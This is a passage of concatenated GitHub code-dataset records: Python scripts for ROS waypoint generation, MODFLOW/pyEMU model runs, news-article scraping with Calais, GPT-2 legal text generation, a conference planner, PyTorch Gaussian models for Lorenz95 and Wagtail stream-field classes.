x2 = self.waypoints[path_id[i+1]][0]\n y1 = self.waypoints[path_id[i]][1]\n y2 = self.waypoints[path_id[i+1]][1]\n\n if (x2 - x1) != 0:\n a = (y2 - y1) / (x2 - x1)\n\n # else:\n # a = x1\n b = y1 - a*x1\n split = (x2 - x1)/self.split\n path_point.pose.position.x = self.waypoints[path_id[i]][0]\n path_point.pose.position.y = self.waypoints[path_id[i]][1]\n self.global_path.poses.append(copy.deepcopy(path_point))\n add_split = split\n for i in range(self.split):\n y = a * (add_split + x1) + b\n x = add_split + x1\n path_point.pose.position.x = x\n path_point.pose.position.y = y\n self.global_path.poses.append(copy.deepcopy(path_point))\n add_split += split\n path_point.pose.position.x = self.waypoints[path_id[-1]][0]\n path_point.pose.position.y = self.waypoints[path_id[-1]][1]\n self.global_path.poses.append(copy.deepcopy(path_point))\n self.global_path.header.frame_id = \"map\"\n # print(global_path.poses)\n # self.waypoint_pub.publish(global_path)\n 
self.global_goal_x = path_point.pose.position.x\n self.global_goal_y = path_point.pose.position.y\n\n def check_goal_reach(self):\n cx = self.estimated_pose.pose.pose.position.x\n cy = self.estimated_pose.pose.pose.position.y\n gx = self.global_goal_x\n gy = self.global_goal_y\n dis = math.sqrt((gx - cx) ** 2 + (gy -cy) ** 2)\n # print(dis)\n if dis < 1.0:\n self.goal_reach = True\n else:\n self.goal_reach = False\n\n def process(self):\n r = rospy.Rate(self.HZ)\n while not rospy.is_shutdown():\n if self.goal_reach:\n self.next_waypoint()\n self.check_goal_reach()\n self.waypoint_pub.publish(self.global_path)\n r.sleep()\n\nif __name__ == '__main__':\n local_goal_creator = LocalGoalCreator()\n try:\n local_goal_creator.process()\n except rospy.ROSInterruptException:\n pass\n","repo_name":"hirotakasaito/random_goal_creator","sub_path":"script/waypoint_creator.py","file_name":"waypoint_creator.py","file_ext":"py","file_size_in_byte":6701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"392545536","text":"import os\r\nimport shutil\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pyemu\r\nimport flopy\r\nimport platform\r\n\r\nversion = 'mf2005'\r\nworking_dir = '.'\r\n\r\nif platform.system() == 'Windows':\r\n exe_name = r'D:\\Work\\exec_Win\\MF2005.1_12\\bin\\mf2005dbl'\r\n exe_name += '.exe'\r\nelse:\r\n exe_name = '/Volumes/A_2TB/Work/exec_Mac/mf2005dbl'\r\n\r\n#m = flopy.modflow.Modflow.load('name.nam',model_ws=working_dir,load_only=[])\r\nm = flopy.modflow.Modflow.load('name.nam',model_ws=working_dir,exe_name=exe_name,\r\n version=version,check=False)\r\n\r\n#os.chdir('all_layers')\r\nfor lay in range(m.nlay):\r\n pp_file = 'hk'+str(lay)+'pp.dat'\r\n factors_file = 'hk'+str(lay)+'pp.dat.fac'\r\n out_file = 'arrays/hk_Layer_'+str(lay)+'.ref'\r\n fill_value = 1e+1\r\n pyemu.utils.geostats.fac2real(pp_file=pp_file,factors_file=factors_file,\r\n out_file=out_file,fill_value=fill_value)\r\n\r\n#os.chdir('..')\r\n\r\nexe_name = 'mf2005dbl'\r\nnam_file = 'name.nam'\r\n\r\n#pyemu.helpers.run('mf2005 parent.nam >_mf2005.stdout')\r\npyemu.helpers.run('{0} {1}'.format(exe_name,nam_file))","repo_name":"rj678/pyEMU_examples","sub_path":"MRGB/Notebooks/pilot_points_1/MF2005_dbl/forward_run.py","file_name":"forward_run.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1702564690","text":"import csv\nfrom calais import Calais\nimport utilities\n\ncalais_api = 'placeholder key'\ncalais = Calais(calais_api, submitter='journo-calais-study')\n\nitr = 16\nwhile itr <= 16:\n journo_filename ='C:/Users/Naironi/Documents/School Docs 6/SocNet/feb' + str(itr) + '.txt'\n journo_file = open(journo_filename, 'r')\n journolist = journo_file.readlines()\n\n #Open and read. Create calais variable.\n\n reporterDict = {}\n kc = 0\n articlelist = []\n linecount = []\n length_count = []\n endbody_count= []\n bodylist= []\n opinionlist = []\n\n\n #Open some Dicts and lists. 
Counter is used to form Dict keys below.\n\n\n for line in journolist:\n if 'DOCUMENTS' in line:\n linecount.append(journolist.index(line))\n\n #Making a list that saves index for start of each new article in journolist.\n\n ticker = 0\n while ticker <= len(linecount) - 1:\n if ticker < len(linecount) - 1:\n articlelist.append(journolist[linecount[ticker]:\n linecount[ticker+1]- 1])\n if ticker == len(linecount) - 1:\n articlelist.append(journolist[linecount[ticker]:])\n ticker = ticker + 1\n\n #Nested list of lines into a list of articles.\n\n for article in articlelist:\n kc = kc + 1\n \n for line in article:\n if 'DOCUMENTS' in line:\n medialine = journolist[journolist.index(line)+3]\n \n if medialine == '\\n':\n medialine = journolist[journolist.index(line)+4]\n\n medialine.strip(\"'\")\n medialine.strip('\\n')\n\n if 'LENGTH' in line:\n length_count.append(articlelist[kc-1].index(line))\n stripped_length = line.strip('LENGTH:')\n stripped_length.strip('\\n')\n\n \n #Save outlet, lengths, and index for LENGTH and \"All rights...\" to a variable\n \n if 'BYLINE' in line:\n stripped_line = line.strip('BYLINE:')\n stripped_line.strip('\\n')\n\n if 'SECTION' in line:\n opinion_line = line.lower()\n if 'editorial' in opinion_line or 'commentary' in opinion_line:\n opinion = 'Opinion'\n else:\n opinion = 'Not Opinion'\n\n\n #Save bylines and whether or not opinion to a variable\n\n if 'BYLINE' not in str(article):\n stripped_line = 'NA'\n\n if 'LENGTH' not in str(article):\n length_count.append('NA')\n\n if 'SECTION' not in str(article):\n opinion = 'Not Opinion'\n\n #Mark as NA for those without byline.\n\n body = articlelist[kc-1][length_count[kc-1] + 2:-3]\n\n bodystring = ''.join(body)\n result = calais.analyze(bodystring)\n\n #Saves the body between LENGTH line and Copyright line, then analyzes in Calais.\n\n itemlist = []\n for item in result.entities:\n if 'Organization' in item['_type']:\n itemlist.append(item['name'])\n\n orglist = []\n for a in itemlist:\n b = a.replace('\\n', ' ')\n orglist.append(b)\n\n topiclist = []\n try:\n for sublist in result.topics:\n topiclist.append(sublist['categoryName'])\n\n except AttributeError:\n topiclist = ['None']\n\n #Pull Calais results for Organizations out and save to orglist.\n\n reporterDict[kc] = [medialine.strip()]\n reporterDict[kc].append(stripped_line.strip())\n reporterDict[kc].append(stripped_length.strip())\n reporterDict[kc].append(orglist)\n reporterDict[kc].append(opinion)\n reporterDict[kc].append(topiclist)\n \n #Drop variables into dictionary.\n\n export_name = 'C:/Users/Naironi/Documents/School Docs 6/SocNet/output' + str(itr) + '.csv'\n\n utilities.writeDictToCSV(reporterDict, export_name)\n\n itr = itr + 1\n\n #Iterate up the export.\n\n","repo_name":"snydermc/socnethomework","sub_path":"media-scraper-iteration6.py","file_name":"media-scraper-iteration6.py","file_ext":"py","file_size_in_byte":3955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"33112761253","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Create Date: 2023/5/20 17:10\n\"\"\"Description: local inference interface\n\"\"\"\nimport json\n\nimport fire\nimport torch\nfrom transformers import BertTokenizer, GPT2LMHeadModel, TextGenerationPipeline\n\n\ndef generate(datas, tokenizer, model):\n \"\"\"Run prediction on the data\n :param datas: data in JSON format\n :param tokenizer: tokenizer instance\n :param model: model instance\n :return:\n \"\"\"\n def output_format(text):\n text = text.split(\"。本院认为,\")[1].split(\"<生成结束>\")[0]\n return text\n\n question_list = []\n for d_one in datas:\n question_list.append(d_one[\"input\"].rstrip(\"。\").rstrip(\"。本院认为,\") + \"。本院认为,\")\n\n text_generator = TextGenerationPipeline(model, tokenizer, device=0)\n text_generator.tokenizer.pad_token_id = text_generator.model.config.eos_token_id\n generate_output_list = text_generator(question_list,\n max_length=1020,\n num_beams=1, top_p=0.8,\n num_return_sequences=1,\n eos_token_id=50256,\n pad_token_id=text_generator.model.config.eos_token_id)\n\n for d_one, g_one in zip(datas, generate_output_list):\n d_one[\"model_output\"] = output_format(g_one[0][\"generated_text\"].replace(\" \", \"\"))\n return datas\n\n\ndef main(\n base_model: str = \"\",\n input_file: str = \"\",\n output_file: str = \"\",\n):\n \"\"\"\n :param base_model: path to the model\n :param input_file: path to the input file\n :param output_file: path to the output file\n :return:\n \"\"\"\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n\n tokenizer = BertTokenizer.from_pretrained(base_model)\n model = GPT2LMHeadModel.from_pretrained(base_model).to(device)\n\n with open(input_file, \"r\") as f:\n datas = json.load(f)\n\n generate_datas = generate(datas, tokenizer=tokenizer, model=model)\n\n with open(output_file, \"w\") as f:\n json.dump(generate_datas, f, indent=3, ensure_ascii=False)\n print(\"finish!!!\")\n\n\nif __name__ == \"__main__\":\n fire.Fire(main)","repo_name":"seussg/JurisLMs","sub_path":"aijudge/demo/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"}
{"seq_id":"13211648988","text":"#!/usr/bin/python3\n\nnum = input(\"enter a number: \")\n\nevenOrOdd = \"odd\"\nprimeOrNot = \"prime\"\n\nif int(num) % 2 == 0:\n evenOrOdd = \"even\"\n\nfor i in range(2, (int(num)-1)):\n if int(num) % i == 0:\n primeOrNot = \"not prime\"\n\n\nprint (\"{n} is an {e} number, and {p}\".format(n=num, e=evenOrOdd, p=primeOrNot))\n","repo_name":"vjkancherla/Python-Examples","sub_path":"old_code/03-OddOrEven.py","file_name":"03-OddOrEven.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34295855534","text":"import torch\nimport torch.nn as nn\nimport lorenz95 as l95\nfrom torch.nn import Module\nfrom torch.distributions.multivariate_normal import MultivariateNormal\n\n\ndef requires(test, s=\"\"):\n \"\"\"\n raise an error with text s if the test fails\n test: Bool\n s: String\n return : None\n \"\"\"\n if (not test):\n raise NameError(s)\n\n\ndef vec_to_inds(x_dim, vec_dim):\n \"\"\"\n Computes the indices of scale_tril coeffs,\n scale_tril is filled main diagonal first\n\n x_dim: dimension of the random variable\n vec_dim: dimension of the vector containing the coeffs of loc and scale_tril\n \"\"\"\n ldiag, d, c = x_dim, 0, 0 # diag length, diag index, column index\n inds = [[], []] # list of line and column indexes\n for i in range(vec_dim - x_dim): # loop over the non-mean coeff\n inds[0].append(c+d) # line index\n inds[1].append(c) # column index\n if c == ldiag-1: # the current diag end is reached\n ldiag += -1 # the diag length is decremented\n c = 0 # the column index is reinitialized\n d += 1 # the diag index is incremented\n else: # otherwise, only the column index is incremented\n c += 1\n return inds\n\n\nclass FcZero(Module):\n \"\"\"\n Fully connected neural network with ReZero trick\n \"\"\"\n def __init__(self, layers):\n \"\"\"\n layers: the list of the 
layers dimensions\n \"\"\"\n Module.__init__(self)\n n = len(layers)\n self.lins = nn.ModuleList(\n [nn.Linear(d0, d1) for d0, d1 in zip(layers[:-1], layers[1:])])\n self.acts = nn.ModuleList([nn.LeakyReLU()]*(n-1))\n self.alphas = torch.nn.Parameter(torch.zeros(n-1))\n\n def forward(self, h, t):\n for lin, act, alpha in zip(self.lins[:-1], self.acts, self.alphas):\n h = h + alpha*act(lin(h))\n return self.lins[-1](h)\n\n\nclass Gaussian(MultivariateNormal):\n \"\"\"\n A Gaussian pdf inheriting pytorch's Gaussian pdfs\n \"\"\"\n\n def __init__(self, *args):\n \"\"\"\n args is either a (loc, scale_tril) or a (x_dim, vec)\n \"\"\"\n\n # args is a (x_dim, vec)\n if isinstance(args[0], int):\n x_dim, vec = args\n vec_dim = vec.size(-1)\n if vec_dim == x_dim + 1:\n loc = vec[:, :x_dim]\n scale_tril = torch.eye(x_dim)\\\n .reshape((1, x_dim, x_dim))\\\n .repeat(vec.size(0), 1, 1)\n scale_tril = torch.exp(vec[:, x_dim])\\\n .view(vec.size(0), 1, 1)*scale_tril\n else:\n inds = vec_to_inds(x_dim, vec_dim)\n loc = vec[:, :x_dim]\n lbda = torch.cat(\n (torch.exp(vec[:, x_dim:2*x_dim]), # ensures positive diag\n vec[:, 2*x_dim:]), 1)\n scale_tril = torch.zeros(vec.size(0), x_dim, x_dim)\n scale_tril[:, inds[0], inds[1]] = lbda\n MultivariateNormal.__init__(self, loc=loc, scale_tril=scale_tril)\n\n # args is a loc, scale_tril\n else:\n MultivariateNormal.__init__(self, loc=args[0], scale_tril=args[1])\n\n self.dim = self.event_shape[0] # the RV dimension USELESS\n\n def margin(self):\n \"\"\"\n If self is a pdf over (x0, x1),\n return is the pair of marginals pdfs of x0 and x1\n \"\"\"\n\n n01 = self.mean.size(-1)\n requires(n01 % 2 == 0, \"the RV dim is not pair\")\n n = n01 // 2\n \"\"\"\n The Multivariate-Normal class may not accept rectangular scale_tril\n so the covariance of x1 should be computed,\n then a Cholesky decomposition is performed to get L1, its sqrt.\n \"\"\"\n loc01 = self.mean\n loc0, loc1 = loc01[:, :n], loc01[:, n:]\n L01 = self.scale_tril\n L0 = L01[:, :n, :n]\n C01 = self.covariance_matrix\n C1 = C01[:, n:, n:]\n L1 = torch.cholesky(C1)\n return Gaussian(loc0, L0), Gaussian(loc1, L1)\n\n\nclass Id():\n \"\"\"\n Dumb Id class behaving like a id function\n \"\"\"\n def __init__(self):\n pass\n\n def __call__(self, x, t):\n return x\n\n\nclass Lorenz_cpdf():\n \"\"\"\n A Gaussian cpdf having lorenz95 as mean and a cst cov matrix\n \"\"\"\n def __init__(self, sigma_Q=0.1, Ndt=1, dt=0.05):\n self.Ndt = Ndt\n self.dt = dt\n self.sigma_Q = sigma_Q\n\n def __call__(self, x, t):\n \"\"\"\n Making Lambda_Q here allows to use x's dimensions\n but may be bad for performance\n \"\"\"\n Lambda_Q = self.sigma_Q*torch.eye(x.size(-1))\\\n .expand(x.size(0), -1, -1)\n return Gaussian(l95.M(x, self.Ndt, self.dt), Lambda_Q)\n\n\nclass Id_mu_cpdf():\n \"\"\"\n A Gaussian cpdf having id as mean and a cst cov matrix\n \"\"\"\n def __init__(self, sigma_R=1):\n self.sigma_R = sigma_R\n\n def __call__(self, x, t):\n \"\"\"\n Making Lambda_R here allows to use x's dimensions\n but may be bad for performance\n \"\"\"\n Lambda_R = self.sigma_R*torch.eye(x.size(-1))\\\n .expand(x.size(0), -1, -1)\n return Gaussian(x, Lambda_R)\n\n\nclass FcZero_mu_cst_Lambda_cpdf(Module):\n \"\"\"\n A Gaussian cpdf having a FcZero net as mean\n and a cst matrix as cov\n \"\"\"\n def __init__(self, layers, vec_dim):\n Module.__init__(self)\n x_dim = layers[-1]\n self.loc = FcZero(layers)\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n\n def forward(self, x, t):\n loc_ = self.loc(x, t)\n vec = torch.cat((loc_, 
self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(loc_.size(-1), vec)\n\n\nclass Id_mu_cst_Lambda_cpdf(Module):\n \"\"\"\n A Gaussian cpdf having id as mean\n and a learnable cst matrix as cov\n \"\"\"\n def __init__(self, x_dim, vec_dim):\n \"\"\"\n n: mu dimension\n ndiag: number of learnable\n \"\"\"\n Module.__init__(self)\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n\n def forward(self, x, t):\n vec = torch.cat((x, self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(x.size(-1), vec)\n\n\nclass Lorenz_mu_cst_Lambda_cpdf(Module):\n \"\"\"\n A Gaussian cpdf having l95 as mean\n and a learnable cst matrix as cov\n \"\"\"\n def __init__(self, x_dim, vec_dim, Ndt=1, dt=0.05):\n \"\"\"\n n: mu dimension\n ndiag: number of learnable\n \"\"\"\n Module.__init__(self)\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n self.Ndt = Ndt\n self.dt = dt\n\n def forward(self, x, t):\n vec = torch.cat((l95.M(x, self.Ndt, self.dt),\n self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(x.size(-1), vec)\n\n\nclass FcZero_cpdf(Module):\n \"\"\"\n A Gaussian cpdf from a FcZero net,\n the net outputs a vec that is transformed into a Gaussian\n \"\"\"\n\n def __init__(self, dim, layers):\n Module.__init__(self)\n self.f = FcZero(layers)\n self.dim = dim\n\n def forward(self, x, t):\n return Gaussian(self.dim, self.f(x, t))\n\n\nclass RK_mu_cst_Lambda_cpdf(Module):\n def __init__(self, x_dim, vec_dim, window=(-2, -1, 0, 1), N=1, dt=0.05):\n Module.__init__(self)\n self.x_dim = x_dim\n self.vec_dim = vec_dim\n self.scale_vec = nn.Parameter(torch.zeros(vec_dim - x_dim))\n self.N = N\n self.dt = dt\n self.window = window\n self.diameter = len(window)\n self.lin = nn.Linear(in_features=self.diameter,\n out_features=1,\n bias=True)\n self.bil = nn.Bilinear(in1_features=self.diameter,\n in2_features=self.diameter,\n out_features=1,\n bias=False)\n\n def EDO(self, x):\n v = torch.cat(\n [torch.roll(x.unsqueeze(1), i, 2) for i in self.window], 1)\n v = torch.transpose(v, 1, 2)\n v_flat = v.reshape(-1, self.diameter)\n dx = self.lin(v_flat) + self.bil(v_flat, v_flat)\n return dx.view(x.size(0), x.size(1))\n\n def RK(self, x):\n for _ in range(self.N):\n k1 = self.EDO(x)\n k2 = self.EDO(x + 0.5*self.dt*k1)\n k3 = self.EDO(x + 0.5*self.dt*k2)\n k4 = self.EDO(x + self.dt*k3)\n x = x + (self.dt/6.0)*(k1 + 2.0*k2 + 2.0*k3 + k4)\n return x\n\n def forward(self, x, t):\n y = self.RK(x)\n vec = torch.cat((y, self.scale_vec.expand(x.size(0), -1)), 1)\n return Gaussian(x.size(-1), vec)\n\n\n# Auxiliary losses\ndef loss_aux(key, q01b, q01a, x01):\n \"\"\"\n key: string, the loss name\n q01b: prior pdf over 2 consecutive states\n q01a: posterior pdf over 2 consecutive states\n x01: true state\n \"\"\"\n n01 = q01b.dim\n requires(n01 % 2 == 0, \"the RV dim is not pair\")\n n = n01 // 2\n if key == \"logpdf_01b\":\n return -torch.mean(q01b.log_prob(x01))\n elif key == \"logpdf_01a\":\n return -torch.mean(q01a.log_prob(x01))\n elif key == \"rmse_0b\":\n return torch.mean(\n torch.norm(\n x01[:, :n]-q01b.mean[:, :n], dim=1)/(n**0.5))\n elif key == \"rmse_1b\":\n return torch.mean(\n torch.norm(\n x01[:, n:]-q01b.mean[:, n:], dim=1)/(n**0.5))\n elif key == \"rmse_0a\":\n return torch.mean(\n torch.norm(\n x01[:, :n]-q01a.mean[:, :n], dim=1)/(n**0.5))\n elif key == \"rmse_1a\":\n return torch.mean(\n torch.norm(\n x01[:, n:]-q01a.mean[:, n:], dim=1)/(n**0.5))\n else:\n raise NameError(key + \" is not defined in loss_aux\")\n\n\ndef print_last(**kwargs):\n \"\"\"\n prints the output 
dict last values\n \"\"\"\n for key, val in kwargs.items():\n if isinstance(val, type([])):\n if val == []:\n s = \"\"\n else:\n s = '{:.2e}'.format(val[-1])\n else:\n s = str(val)\n print(key + \" = \" + s)\n\n\ndef save_dict(prefix, **kwargs):\n \"\"\"\n saves the output dict\n \"\"\"\n for key, val in kwargs.items():\n torch.save(val, prefix + key + \".pt\")\n","repo_name":"AnthonyFillion-UnivToulouse/VAA","sub_path":"aux.py","file_name":"aux.py","file_ext":"py","file_size_in_byte":10270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24317817194","text":"import csv, argparse\nfrom talks import Talk, TalksList\nfrom conference import Conference\nimport pdb\n\ndef main():\n\tap = argparse.ArgumentParser()\n\tap.add_argument(\"-p\", \"--path\", required=True, help=\"path csv file containing talks\")\n\targs = vars(ap.parse_args())\n\n\t# Load arguments\n\tfile_name = args['path']\n\n\t# Global variables\n\tn_days = 3 # (days)\n\tstarting_time = 9 # (hours)\n\tclosing_time = 17 # (hours)\n\tcleaning_break = 15 # (minutes)\n\tlunch_break = [12,13] # (hours)\n\n\t# Create talk list object\n\ttList = TalksList()\n\n\t# Load list of talks into the TalkList object\n\twith open(file_name, newline='') as csvfile:\n\t\ttalksreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n\t\tfor idx, row in enumerate(talksreader):\n\t\t\tif idx == 0:\n\t\t\t\tpass\n\t\t\telse:\n\t\t\t\ttList.add_talk(Talk(row[0], row[1], row[2]))\n\n\t# Create Conference object\n\tconf = Conference(n_days, starting_time, closing_time, cleaning_break, lunch_break)\n\n\t# Fit list of talks into the conference\n\tconf.fit_talks(tList)\n\n\t# Load Agenda and print it\n\tagenda = conf.get_agenda()\n\tfor row in agenda:\n\t\tprint(row)\n\nif __name__ == '__main__':\n\tmain()\n","repo_name":"saraRaris/Conference-planner","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"74480053351","text":"import copy\nimport re\n\nfrom django.core import checks, validators\nfrom django.core.exceptions import ValidationError\nfrom django.forms import Media\nfrom django.utils.encoding import force_str\nfrom django.utils.text import capfirst\nfrom django.utils.translation import ugettext as _\n\nfrom wagtail.core.models import Page, Site\nfrom wagtail.core.utils import resolve_model_string\nfrom wagtail.documents import get_document_model\nfrom wagtail.images import get_image_model\n\n__all__ = [\n 'BooleanField',\n 'CharField',\n 'ChoiceField',\n 'DocumentChooserField',\n 'Field',\n 'ImageChooserField',\n 'IntegerField',\n 'ModelChooserField',\n 'PageChooserField',\n 'ReadOnlyCharField',\n 'RichTextField',\n 'TextField',\n]\n\n\nclass Field:\n '''Base class for all fields.'''\n args_list = [\n 'name',\n 'label',\n 'required',\n 'help_text',\n 'default',\n ]\n empty_values = list(validators.EMPTY_VALUES)\n default_validators = []\n default_error_messages = {\n 'required': _('This field is required.'),\n }\n default_value = None\n\n def __init__(self, required=True, validators=(), help_text='', error_messages=None, label=None, default=None):\n self._required = required\n self._name = ''\n self._label = None\n self._default = None\n self.help_text = help_text\n self.default = default\n\n if label is not None:\n self.label = label\n\n messages = {}\n for c in reversed(self.__class__.__mro__):\n messages.update(getattr(c, 
'default_error_messages', {}))\n messages.update(error_messages or {})\n self.error_messages = messages\n\n self.validators = [*self.default_validators, *validators]\n\n def __deepcopy__(self, memo):\n result = copy.copy(self)\n memo[id(self)] = result\n result.error_messages = self.error_messages.copy()\n result.validators = self.validators[:]\n return result\n\n def get_args(self):\n '''Returns the arguments needed to reproduce this instance in JavaScript.'''\n args = {}\n for name in self.args_list:\n args[name] = getattr(self, name)\n\n if 'default' in args:\n if args.get('default', None) is None:\n # do not render a \"default\" argument if the default value is None.\n del args['default']\n else:\n # we have to convert to JSON to ensure that the output is valid JavaScript\n args['default'] = self.to_json(args['default'])\n return args\n\n def get_dependencies(self):\n '''If this field depends on any other blocks then override this method and return them here.'''\n return {}\n\n @property\n def media(self):\n '''Allow the field to pass Media objects out to the `altstreamfield.fields.BlockInput` widget.'''\n return None\n\n def to_python(self, value):\n '''Converts the JSON value to an equivalent Python value.'''\n return value\n\n def to_json(self, value):\n '''Converts the Python value to an equivalent JSON value (a value that can be passed to json.dump).'''\n return value\n\n def validate(self, value):\n '''Does basic validation that cannot be done with validators.\n\n Override this method to perform custom validation.\n '''\n if value in self.empty_values and self._required:\n raise ValidationError(self.error_messages['required'], code='required')\n\n def run_validators(self, value):\n '''Runs registered validators against the value and raises a ValidationError if any validators fail.'''\n if value in self.empty_values:\n return\n errors = []\n for v in self.validators:\n try:\n v(value)\n except ValidationError as e:\n if hasattr(e, 'code') and e.code in self.error_messages:\n e.message = self.error_messages[e.code]\n errors.extend(e.error_list)\n if errors:\n raise ValidationError(errors)\n\n def clean(self, value):\n value = self.to_python(value)\n self.validate(value)\n self.run_validators(value)\n return value\n\n def check(self):\n return []\n\n def _check_name(self, name):\n \"\"\"Helper method called as part of the system checks framework, to\n validate that the passed in name is a valid identifier.\n \"\"\"\n errors = []\n if not name:\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n hint=\"Field name cannot be empty\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n if ' ' in name:\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n hint=\"Field names cannot contain spaces\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n if '-' in name:\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n \"Field names cannot contain dashes\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n if name and name[0].isdigit():\n errors.append(checks.Error(\n \"Field name %r is invalid\" % name,\n \"Field names cannot begin with a digit\",\n obj=self,\n id='altstreamfield.E001',\n ))\n\n return errors\n\n @property\n def name(self):\n return self._name\n\n @name.setter\n def name(self, value):\n self._name = value\n\n @property\n def label(self):\n if self._label is not None:\n return self._label\n else:\n return capfirst(self._name.replace('_', ' '))\n\n @label.setter\n def label(self, label):\n self._label = label\n\n @property\n 
def default(self):\n return self._default\n\n @default.setter\n def default(self, default):\n self._default = default\n\n @property\n def required(self):\n return self._required\n\n\nclass CharField(Field):\n '''Represents a single line of text.'''\n args_list = Field.args_list + [\n 'strip',\n 'min_length',\n 'max_length',\n ]\n\n def __init__(self, max_length=None, min_length=None, strip=True, **kwargs):\n super().__init__(**kwargs)\n self.strip = strip\n\n # prevent something dumb.\n if max_length and min_length and max_length < min_length:\n raise ValueError(\"Cannot have a max_length that is smaller than the min_length.\")\n\n self.max_length = max_length\n self.min_length = min_length\n\n if max_length is not None:\n self.validators.append(validators.MaxLengthValidator(int(max_length)))\n if min_length is not None:\n self.validators.append(validators.MinLengthValidator(int(min_length)))\n self.validators.append(validators.ProhibitNullCharactersValidator())\n\n def to_python(self, value):\n '''Ensures that the JSON value is converted to a proper Python string.'''\n if value not in self.empty_values:\n value = str(value)\n if self.strip:\n value = value.strip()\n if value in self.empty_values:\n return ''\n return value\n\n def get_searchable_content(self, value):\n return [force_str(value)]\n\n\nclass ReadOnlyCharField(CharField):\n '''This is a field that never allows a user to set the value.\n\n This is useful where the value needs to be controlled by code but the user\n needs to be aware of the value.\n '''\n args_list = [\n item for item in CharField.args_list\n if item not in ['max_length', 'min_length', 'required']\n ]\n\n def __init__(self, max_length=None, min_length=None, strip=True, **kwargs):\n super().__init__(max_length=None, min_length=None, strip=strip, **kwargs)\n\n @property\n def required(self):\n '''Read only fields should never be required.'''\n return False\n\n\nclass TextField(CharField):\n '''Represents multiple lines of text.'''\n pass\n\n\nclass IntegerField(Field):\n '''Represents and integer value.'''\n args_list = Field.args_list + [\n 'min_value',\n 'max_value',\n ]\n default_error_messages = {\n 'invalid': _('Enter a whole number.'),\n }\n re_decimal = re.compile(r'\\.0*\\s*$')\n\n def __init__(self, min_value=None, max_value=None, **kwargs):\n super().__init__(**kwargs)\n\n if min_value and max_value and max_value < min_value:\n raise ValueError('Cannot have a max_value that is less than the min_value.')\n\n self.min_value = min_value\n self.max_value = max_value\n\n if min_value is not None:\n self.validators.append(validators.MinValueValidator(min_value))\n if max_value is not None:\n self.validators.append(validators.MaxValueValidator(max_value))\n\n def to_python(self, value):\n '''Validate that int() can be called on the input. 
Return the result of int() or None for empty values.'''\n value = super().to_python(value)\n if value in self.empty_values:\n return None\n try:\n value = int(self.re_decimal.sub('', str(value)))\n except (ValueError, TypeError):\n raise ValidationError(self.error_messages['invalid'], code='invalid')\n return value\n\n\nclass BooleanField(Field):\n '''Represents a boolean value.'''\n\n def to_python(self, value):\n if isinstance(value, str) and value.lower() in ('false', '0'):\n value = False\n else:\n value = bool(value)\n return super().to_python(value)\n\n\nclass CallableChoiceIterator:\n def __init__(self, choices_func):\n self.choices_func = choices_func\n\n def __iter__(self):\n yield from self.choices_func()\n\n\nclass ChoiceField(Field):\n '''Represents a selection from a list of choices.'''\n args_list = Field.args_list + [\n 'choices',\n ]\n default_error_messages = {\n 'invalid_choice': _('Select a valid choice. %(value)s is not one of the available choices.'),\n }\n\n def __init__(self, choices=(), **kwargs):\n super().__init__(**kwargs)\n self.choices = choices\n\n def __deepcopy__(self, memo):\n result = super().__deepcopy__(memo)\n result._choices = copy.deepcopy(self._choices, memo)\n return result\n\n @property\n def choices(self):\n return self._choices\n\n @choices.setter\n def choices(self, value):\n if callable(value):\n value = CallableChoiceIterator(value)\n else:\n value = list(value)\n\n self._choices = value\n\n def to_python(self, value):\n '''Ensure that the value is a string or empty string.'''\n if value in self.empty_values:\n return ''\n return str(value)\n\n def validate(self, value):\n '''Custom validation to ensure that the value is in the list of choices.'''\n super().validate(value)\n if value and not self.valid_value(value):\n raise ValidationError(\n self.error_messages['invalid_choice'],\n code='invalid_choice',\n params={'value': value},\n )\n\n def valid_value(self, value):\n \"\"\"Check to see if the provided value is a valid choice.\"\"\"\n text_value = str(value)\n for k, v in self.choices:\n if isinstance(v, (list, tuple)):\n # This is an optgroup, so look inside the group for options\n for k2, v2 in v:\n if value == k2 or text_value == str(k2):\n return True\n else:\n if value == k or text_value == str(k):\n return True\n return False\n\n\nclass RichTextField(Field):\n '''Represents rich text.'''\n\n @property\n def media(self):\n return Media(\n js=[\n 'wagtailadmin/js/draftail.js',\n 'wagtailadmin/js/page-chooser-modal.js',\n 'wagtaildocs/js/document-chooser-modal.js',\n 'wagtailembeds/js/embed-chooser-modal.js',\n 'wagtailimages/js/image-chooser-modal.js',\n ],\n css={\n 'all': ['wagtailadmin/css/panels/draftail.css']\n }\n )\n\n\nclass ModelChooserField(Field):\n '''Base class for Model based chooser fields.'''\n model = None\n\n def to_python(self, value):\n '''Converts the JSON value to an equivalent Python value.'''\n if value is None:\n return None\n\n try:\n return self.model.objects.get(pk=value)\n except:\n raise ValidationError('Document with primary key {} does not 